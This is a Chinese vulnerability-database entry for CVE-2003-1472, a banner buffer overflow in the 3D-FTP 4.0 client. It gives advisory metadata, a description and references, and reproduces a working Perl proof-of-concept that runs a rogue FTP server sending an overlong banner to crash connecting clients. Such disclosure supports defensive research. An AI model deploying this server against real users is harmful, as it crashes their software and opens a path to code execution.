3D-FTP Client缓冲区溢出漏洞

3D-FTP Client缓冲区溢出漏洞

漏洞ID 1107291 漏洞类型 缓冲区溢出
发布时间 2003-04-28 更新时间 2003-12-31
图片[1]-3D-FTP Client缓冲区溢出漏洞-安全小百科CVE编号 CVE-2003-1472
图片[2]-3D-FTP Client缓冲区溢出漏洞-安全小百科CNNVD-ID CNNVD-200312-096
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/22551
https://cxsecurity.com/issue/WLB-2007100118
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200312-096
|漏洞详情
3D-FTPclient4.0版本存在缓冲区溢出漏洞。远程FTP服务器借助超长标语导致服务拒绝(崩溃)和可能执行任意代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/7451/info

It has been reported that 3D-FTP client may be prone to a buffer overflow condition. This issue is due to the client not implementing sufficient bounds checking on banner data copied into local memory buffers.

It may be possible for remote attackers to corrupt sensitive regions of memory with attacker-supplied values, possibly resulting in execution of arbitrary code.

#!/usr/bin/perl
########################################################
#
# Banner Buffer Overflow remote exploit in FTP Clients
#
#
#!/usr/bin/perl
########################################################
#
# Banner Buffer Overflow remote exploit in FTP Clients
#
#
#                by Over_G [DWC Gr0up]
#
#         www.dwcgr0up.com      www.overg.com
#########################################################
use IO::Socket;
$port = "21";
$data = "a";
$bsize = $ARGV[0];

print "n  Banner Buffer Overflow remote exploit in FTP Clientsnn";
print "           by Over G[DWC Gr0up]n";
print "     www.dwcgr0up.com www.overg.comnn";

if (defined $bsize) {}
 else {
  print "Incorrect parameters.n";
  die "Usage: perl ftpbanex.pl [buffer_size]n";
}
print "Creating server...n";
$buf .= $data x $bsize;
$server = IO::Socket::INET->new(LocalPort => $port, Type =>
SOCK_STREAM, Reuse => 1, Listen => 2)
or die "Couldn't create server.n";
print "Awayting connections...n";
while ($client = $server->accept())
{
 print "Client connected.n";
 print "Attacking...";
 print $client "$buf";
 print "OKn";
 close($client);
}
|参考资料

来源:XF
名称:3dftp-ftp-banner-bo(11883)
链接:http://xforce.iss.net/xforce/xfdb/11883
来源:BID
名称:7451
链接:http://www.securityfocus.com/bid/7451
来源:BUGTRAQ
名称:20030428Bufferoverflowin3D-ftp
链接:http://www.securityfocus.com/archive/1/319818
来源:SREASON
名称:3297
链接:http://securityreason.com/securityalert/3297

相关推荐: Message Foundry Multiple Vulnerabilities

Message Foundry Multiple Vulnerabilities 漏洞ID 1099811 漏洞类型 Unknown 发布时间 2003-07-17 更新时间 2003-07-17 CVE编号 N/A CNNVD-ID N/A 漏洞平台 N/A…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享